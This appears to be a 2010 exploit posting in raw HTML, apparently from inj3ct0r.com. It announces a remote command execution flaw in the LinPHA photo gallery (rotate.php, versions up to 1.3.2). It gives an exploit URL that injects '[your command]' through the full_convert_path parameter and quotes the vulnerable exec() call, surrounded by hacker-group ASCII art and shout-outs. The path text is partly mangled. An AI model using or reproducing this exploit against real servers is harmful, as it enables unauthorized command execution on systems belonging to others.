LinPHA <= 1.3.2 (rotate.php) Remote Command Execution Vul
Posted on 16 May 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>LinPHA <= 1.3.2 (rotate.php) Remote Command Execution Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=================================================================== LinPHA <= 1.3.2 (rotate.php) Remote Command Execution Vulnerability =================================================================== __ __ ___ __ __ /'__` / \__ /'__` /\_ ___ /\_/\_L ___ ,_/ / _ __ ___ ___ ___ ___ / /' _ ` / /_/_\_<_ /'___ / /`'__ /'___ / __` /' __` __` / / / L / \__/ \_ \_ / __/ \__// L / / / \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ /\_ \____ \____/ \_ \_ \_ /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ /_//____//___/ /_//_//_/ \____/ /___/ # ----------------------oOO---(_)---OOo----------------------- # | __ __ | # | _____/ /_____ ______/ /_ __ ______ ______ | # | / ___/ __/ __ `/ ___/ __ / / / / __ `/ ___/ | # | (__ ) /_/ /_/ / / / /_/ / /_/ / /_/ (__ ) | # | /____/\__/\__,_/_/ /_.___/\__,_/\__, /____/ | # | Security Sn!pEr.S!Te /____/ 2o1o | # ------------------------------------------------------------ Remote Command Execution Vulnerability # ------------------------------------------------------------ -------------------------------------------------------------- LinPHA <== 1.3.2 ( rotate.php ) -------------------------------------------------------------- #[+] Author : Sn!pEr.S!Te Hacker # # [+] Email : sniper-site@HoTMaiL.coM # # [+] T34M Sn!pEr.S!Te Hacker # # [+] 16-5-2010 # # [+] Script : lmage » LinPHA Photo Gallery# # [+] Download:http://sourceforge.net/projects/linpha/files/linpha/linpha-1.3.4/linpha-1.3.4.zip/download # # Version: [1.3.2] # =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-= Exploit : linpha-1.3.4actions otate.php http://localhost/linpha-1.3.4actions otate.php?full_convert_path= [your command] htpp://127.0.0.1/linpha-1.3.4actions otate.php?full_convert_path= [your command] exec($full_convert_path.' -rotate '.$rotate.' '.escape_string($img2rotate).' '.escape_string($img2rotate)); line : 78 web site Favorites my : http://inj3ct0r.com/ & http://www.hack0wn.com/ & http://www.exploit-db.com friend my : liar - sm Hacker -baby hacker -dmar -saleh Hacker - ALhal alsab - Mr.SaTaN - abo badr - aStoorh alqssim - Ramad Hacker- h-ex - yousfe - Hiter.3rb - QAHER ALRAFDE - DjHacker - My Heart - Mr.koka- # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-16]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>